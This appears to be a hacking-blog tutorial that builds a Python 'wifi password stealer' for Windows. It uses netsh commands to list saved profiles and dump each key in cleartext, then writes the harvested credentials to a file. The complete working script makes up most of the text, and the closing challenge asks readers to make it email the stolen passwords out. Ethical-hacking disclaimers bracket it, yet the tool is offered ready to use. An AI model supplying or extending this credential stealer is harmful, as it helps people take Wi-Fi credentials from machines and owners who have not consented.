In this tutorial I'm going to show you how you can create a simple python script that can steal passwords for all the wi-fi networks on a computer. But before we jump into into scripting. This can save you a lot of time and effort unlike using brute forcing method.

So, before we start I wanna stress a few things. First, Anything I'm doing here is happening on my local network. Do not do anything that can get you into trouble. Be an ethical hacker. In this example everything is being done on my personal laptop. I own all the networks that I'm going to demonstrate here. I'm not trying to connect to someone's network or hack them.

All of this networks are just test networks that I'm going to demonstrate the power of python and the power of knowing a little bit of coding as a pentester or hacker. Second, don't be script kiddie, try to write your own applications and get your hacking tools to do what you want them to do and if there isn't a hacking tool that does what you want to do create your own. Finally, I assume you have basic Python knowledge, if not, they're a few youtube channels to get you started with Python. Below is my recommendation.

CoreyMs Youtube Channel

That's it for the introduction, let's now jump right into the part we want.

Manually finding Passwords using Windows Command Prompt

Before we jump into the coding part, I want to show you how you can find saved Wi-Fi passwords on a PC using Windows command prompt: So if you want to see the information of a specific wireless network you have to issue the following command:

netsh wlan show profiles

This will show all the saved Wi-Fi networks on a pc. To see the information of a specific profile or network together with its password(the juicy part we want) you issue the following command:

netsh wlan show profile <profile_name_here> key=clear

By using this command I was able to retrieve the password of that specific ssid/profile/wifi name. Now let's use Python to automate this process because we don't want to repeat the same command for every network. We also want to see only the network name and password, not all the other information we are not interested in.

Automate the process With Python

# allows us to run system commands
import  subprocess

# import the re module, allows us to use regular expressions
import re

In the above code, we imported subprocess and re module. The subprocess module allows us to run system commands by making use of the function it provides. This tutorial will focus on the run method of the subprocess module. The regular expression module (re) allows us to search for a specific pattern from a string/text.

subprocess.run(, ).

Let's continue with our code

# running the (netsh wlans show profile command) and capture the output into a variable
command_output = subprocess.run(["netsh", "wlan", "show", "profiles"], capture_output = True).stdout.decode()

In the above code we use the subprocess.run to run the commands provided in a list* as an argument. We then specified the second argument as capture_output = True to save the contents/result of the command that gets sent to the standard output stream(terminal screen). This information gets stored in the *stdout attribute as bytes and needs to be decoded before being used as a string in Python. We then saved the decoded output into the variable command_output. The output we store in a variable looks like this:

Note: this might not be the same as yours

Profiles on interface Wi-Fi:

Group policy profiles (read only)
---------------------------------
    <None>


User profiles
-------------
    All User Profile     : Jecha ZOL_LTE
    All User Profile     : DIRECT-AK-HYPE-PdaNet
    All User Profile     : Waiting.....
    All User Profile     : 0x

Profiles on interface Wi-Fi 2:

Group policy profiles (read only)
---------------------------------
    <None>

User profiles
-------------
    All User Profile     : Not for free
    All User Profile     : Waiting.....
    All User Profile     : NACHI
    All User Profile     : Jecha ZOL_LTE
    All User Profile     : DIRECT-AK-HYPE-PdaNet
    All User Profile     : TSANGA
    All User Profile     : 0x
    All User Profile     : BaTX-QnJhZGxleQ
    All User Profile     : BTjw-U01KMTA1Rg
    All User Profile     : NHEPA

From the output, we are only interested in the profile/ssid/wi-fi-names. So we will use regular expressions to get the part we want from the output.

# using regular expressions to grep the string we want from the above command output and save it into a variable
profile_names = set(re.findall(r"All User Profile\s*:(.*)", command_output))

Here we used the re.findall method to find all the Wi-Fi networks which are listed after All User Profile (check the output above). So this method will return a list of all the matches found, we convert the list returned to a set in order to remove duplicates and finally we save them in a variable profile_names

Note: it is possible to encounter duplicate ssids/profiles/wifi names if you are using multiple wireless cards. As you can see from the output above.

Now let's code the last part of the program

# this will store the wifi ssids and their corresponding password(ssid: password)
wifi_data = ""

# iterate throgh the profile names 
for profile in profile_names:

    # remove trailing whitespaces and newline characters
    profile = profile.strip()

    # show the profile details together with the clear text password
    profile_info = subprocess.run(["netsh", "wlan", "show", "profile", profile, "key=clear"], capture_output = True).stdout.decode()

    # use regular expressions to search for the password
    profile_password = re.findall(r"Key Content\s*:(.*)", profile_info)

    # check to see if the profile has password
    if len(profile_password) == 0:
        wifi_data += f"{profile}: Open\n"
    else:
        wifi_data += f"{profile}: {profile_password[0].strip()}\n"

# save the wifi details in a file      
with open("wifis.txt", "w") as file:
    file.write(wifi_data)

Now let's go through the above code step by step.

We first created a variable wifi_data to store network names(ssids) and their corresponding password. We begin a for loop that will iterate through each profile and remove any leading or trailing white spaces and new line characters using the strip function. After that, we execute a command to show the specified ssid/profile password using the subprocess.run method and store the output in the variable profile_info.

Next, we used the re.findall method to find the password of a profile from the profile_info variable and then we store the found password in a variable named profile_password. After that we check if our profile has a password, if it doesn't have password we append this statement profile name: Open into the variable wifi_data otherwise we append the profile name and the password to the wifi_data.

Finally, we write the data in wifi_data variable into a file wifi.txt.

Now here is your challenge/task:

• improve the script to be able to send the wi-fi passwords back to your email, you can tweet me with your code or join our telegram chatroom

Complete code: wifi password stealer

Pretty cool, we're done! Congrats if you have reached this far

If you have an query or question feel free to dm me @xtremepentest.

Suggestions are welcome, feel free to give me your suggestions and opinions @xtremepentest or in the comment section below.

DISCLAIMER: Use this attack on a machine that you have permission to test, otherwise we are not responsible for any harm you do to anyone.

Happy Hacking